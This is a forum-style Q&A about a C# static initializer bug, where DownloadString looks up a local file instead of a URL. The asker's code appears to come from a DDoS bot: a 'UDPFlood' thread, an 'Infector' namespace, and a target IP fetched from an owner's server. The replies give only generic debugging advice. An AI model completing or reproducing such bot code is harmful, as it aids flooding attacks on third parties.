# C# DownloadString Error

Tags: c#, .net

For some reason, while typing in

```
    public static Thread UDP = new Thread(UDPFlood);
    public static string IP = GetIP();
    public static string ownerURL = "{url}";
    public static string GetIP()
    {
        ownerURL = ownerURL.Replace("{url}","http://www.test.com");
        WebClient ipGrabber = new WebClient();
        return ipGrabber.DownloadString(ownerURL + "/getIP.php");
    }
```

It's throwing this error:

> System.TypeInitializationException: The type initializer for
>   'Infector.FormMain' threw an exception. ---> System.Net.WebException:
>   Could not find file 'C:\getIP.php'. ---> System.Net.WebException:
>   Could not find file 'C:\getIP.php'. --->
>   System.IO.FileNotFoundException: Could not find file 'C:\getIP.php'.

Basically, while using a string + /getIP.php, it's looking for a directory on my computer, and not on the web.

Comment: That must be the replace not working, what is the point of it anyway?

Comment: Can u put a breakpoint at `return` and verify what `ownerURL` is?

Answer (score 4):

The class initializer is likely calling `GetIP` before `ownerURL` is initialized. Thus the `ownerURL.Replace` call isn't doing what you want.

I'd suggest you avoid static initializers for this reason; execution order is hard to predict.

Comment: Upon second glance, this would only be true if your code differs from your sample; otherwise, if `ownerURL` was uninitialized, it'd be `null`, and `ownerURL.Replace` would throw a `NullReferenceException`. Leaving my answer here in case it does prove helpful anyway.